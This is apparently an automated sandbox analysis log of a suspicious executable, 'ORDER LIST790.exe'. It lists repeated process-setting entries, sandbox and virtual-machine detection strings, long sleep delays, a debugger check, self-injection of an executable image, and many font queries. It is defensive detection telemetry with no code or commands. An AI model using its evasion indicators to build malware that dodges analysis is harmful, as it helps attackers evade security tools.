          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess information set: NOGPFAULTERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: Yara matchFile source: 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ORDER LIST790.exe PID: 980, type: MEMORYSTR
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 5492Thread sleep time: -45877s >= -30000s
          Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 5512Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\ORDER LIST790.exe TID: 3744Thread sleep time: -60000s >= -30000s
          Source: C:\Users\user\Desktop\ORDER LIST790.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\ORDER LIST790.exeThread delayed: delay time: 45877
          Source: C:\Users\user\Desktop\ORDER LIST790.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\ORDER LIST790.exeThread delayed: delay time: 60000
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: ORDER LIST790.exe, 00000000.00000002.274188004.00000000036FF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\ORDER LIST790.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\ORDER LIST790.exeMemory written: C:\Users\user\Desktop\ORDER LIST790.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\ORDER LIST790.exeProcess created: C:\Users\user\Desktop\ORDER LIST790.exe C:\Users\user\Desktop\ORDER LIST790.exe
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Users\user\Desktop\ORDER LIST790.exe VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\ORDER LIST790.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
